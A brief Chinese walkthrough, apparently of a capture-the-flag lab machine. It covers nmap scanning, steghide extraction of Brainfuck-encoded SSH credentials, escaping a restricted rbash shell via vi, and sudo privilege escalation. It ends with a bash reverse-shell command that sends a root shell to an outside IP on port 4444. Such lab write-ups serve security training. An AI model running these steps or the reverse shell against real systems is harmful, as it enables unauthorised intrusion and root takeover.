1.查找主机和端口
Nmap -sP 192.168.34.1/24扫描存活主机,并确认靶机(192.168.34.152)
nmap -sV -p0-65535 192.168.34.152查看开发端口
访问下31337端口,是一个网站,查看源代码
有一个jpg图片,访问并下载下来,用steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n将图片隐藏信息提取出来,并查看
经过分析是bf加密
然后以ud64为账号1M!#6@ud为密码进行ssh连接
按tab件查看有哪些命令可以用,并判断出来是rbash
直接用export添加环境变量失败了
用vi绕过
修改一下环境变量就可以执行一些其他命令了
Sudo -l 显示出自己(执行 sudo 的使用者)的权限
发现sysud64可以免密登录
方法二:
反弹:
sudo sysud64 -uroot /bin/bash -c “/bin/sh -i >& /dev/tcp/172.17.135.75/4444 0>&1”